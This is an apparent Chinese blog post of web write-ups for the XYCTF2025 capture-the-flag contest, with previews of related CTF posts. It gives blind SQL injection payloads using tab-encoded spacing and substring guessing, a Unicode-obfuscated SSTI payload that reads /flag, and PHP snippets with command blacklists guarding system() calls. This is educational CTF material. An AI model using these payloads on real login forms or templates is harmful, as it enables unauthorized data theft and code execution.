xyctf2025web部分wp
XYCTF2025
ezsql(手动滑稽):
(真的没有想到是宽字节注入,第一次做,没有做出来,问学长要wp,我还没有复现出来,我是傻逼,现在只能复现了)
首先看见题目是sql注入漏洞,打开是让你登录平台,然后就fuzz测试过滤了空格,转义了’(所以要宽字节注入),关键字到是没有
然后就是使用substring这个函数:
解释:
SUBSTRING(str, pos, len):
str:表示要从中提取子字符串的原始字符串。pos:指定子字符串的起始位置。若为正数,则从字符串的开头开始计数;若为负数,则从字符串的末尾开始计数。len:指定要提取的子字符串的长度。
username=1'%09or%09substring(database()%09FROM%092%09FOR%091)='a'%23&password=1(爆库) |
username=admin'%09OR%09substring((select%09table_name%09from%09information_schema.tables%09where%09table_schema='testdb'%09limit%091%09offset%090)%09FROM%091%09FOR%091)='a'%23&password=1(爆表) |
username=admin'%09OR%09case%09when%09(ascii(substring((select%09column_name%09from%09information_schema.columns%09where%09table_name='double_check'%09limit%091)%09FROM%092%09FOR%091))=116)%09then%091%09else%090%09end=1%23&password=1(爆列) |
username=admin'%09OR%09case%09when%09(ascii(substring((select%09secret%09from%09double_check%09limit%091)%09FROM%092%09FOR%091))=116)%09then%091%09else%090%09end=1%23&password=1 |
然后就像这样一个一个测试,拿到:dtfrtkcc0czkoua9S
同理:这样一个个测出来账号和密码:yudeyoushang/zhonghengyisheng,进去之后直接进行RCE就ok了
ez_puzzle:
这个他要你进行拼图,小游戏先查看js就行,发现不让我看,肯定有好东西,直接ctrl+shift+i查看,知道是小弹窗,js里面搜索alert就行了,发现有判断条件,将小于号改成大于号就行,然后再拼一次就行了。
出题人已疯:
# -*- encoding: utf-8 -*- |
# 定义/attack路径的路由 |
也就是说
需要尝试构造出小于25,并且不包含open和\字符的有效负载或者找到一种方式绕过小于25的限制(不过他是bottle)
经过测试发现可以使用unicode绕过,
%7b%7b%ba%70%65%6e%28%27%2f%66%6c%61%67%27%29%2e%72%65%61%64%28%29%7d%7d |
不过o可以使用%ba进行绕过(用斜体绕过,nb)
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Wea5e1-B10G!
微信 wea5e1 0天 没有吃饭了,求求了
相关推荐
2025-03-16
emojictfweb
emojictfwebRCE:发现f12不能使用,没事,张师傅给我说ctrl+shift+i就可以了,ok.试了试发现没有有用的东西,dirsearch扫描一下发现robots.txt 然后发现 /fl@g.php,查看: <?phphighlight_file(__FILE__);error_reporting(0);if(isset($_GET['emo'])){ $emo = $_GET['emo']; if(!preg_match("/\;|\"|\*| |[b-h]|[m-r]|\\$|\{|\}|\^|\>/i",$emo)){ system($emo); } else{ echo "Again"; }}else{ echo...
2025-03-16
isctf2024web
ISCTF2024:1z_php:if(isset($_POST['J'])){ $call=$_POST['J']; $dangerous_commands = ['cat', 'tac', 'head', 'nl', 'more', 'less', 'tail', 'vi', 'sed', 'od']; foreach ($dangerous_commands as $command) { if (preg_match("/$command/i", $call)) { die("这些个危险函数可不兴使啊"); } } system($call);}?> J=ls / ...
2025-03-17
isctf2023web部分wp
isctf2023web部分wp圣杯战争!!!:<?php highlight_file(__FILE__); error_reporting(0); class artifact{ public $excalibuer; public $arrow; public function __toString(){ echo "为Saber选择了对的武器!<br>"; return $this->excalibuer->arrow; } } class prepare{ public $release; public function __get($key){ $functioin = $this->release; echo "蓄力!咖喱棒!!<br>"; return $functioin(); } } class saber{ ...
2025-03-18
basectf2024web部分wp
basectf2024web部分wpA Dark Room:源码; Aura 酱的礼物:<?php highlight_file(__FILE__); // Aura 酱,欢迎回家~ // 这里有一份礼物,请你签收一下哟~ $pen = $_POST['pen']; if (file_get_contents($pen) !== 'Aura') { die('这是 Aura 的礼物,你不是 Aura!'); } // 礼物收到啦,接下来要去博客里面写下感想哦~ $challenge = $_POST['challenge']; if (strpos($challenge, 'http://jasmineaura.github.io') !== 0) { die('这不是 Aura 的博客!'); } $blog_content = file_get_contents($challenge); if...
2025-04-07
复现xyctf2024
XYCTF:EZhttp:进行dirsearch查看有没有其他东西;发现robots.txt文件,然后一步一步进行,发现账号和密码发现说不是yuanshen.com的不要;改referer;Referer:yuanshen.com发现说不是XYCTF的浏览器;改UA头;User-Agent: XYCTF发现不是本地用户不能访问;client-IP:127.0.0.1发现不是ymzx.qq.com的代理;改via; via:ymzx.qq.com发现想吃cookie的小饼干;改cookie为XYCTF;获得flag EZMAKE:先测试一下一些命令;然后试试新学的echo $(<flag)这个命令是将flag给重定向出来然后echo出来 发现被过滤双写试试得到flag ez?Make:然后上面的方法用不了了;可以试试pwd查看当前的目录;然后看看cd ..可以用吗,发现可以使用; ok了,可以cd ..&&cd ..&&cd ..&&more...
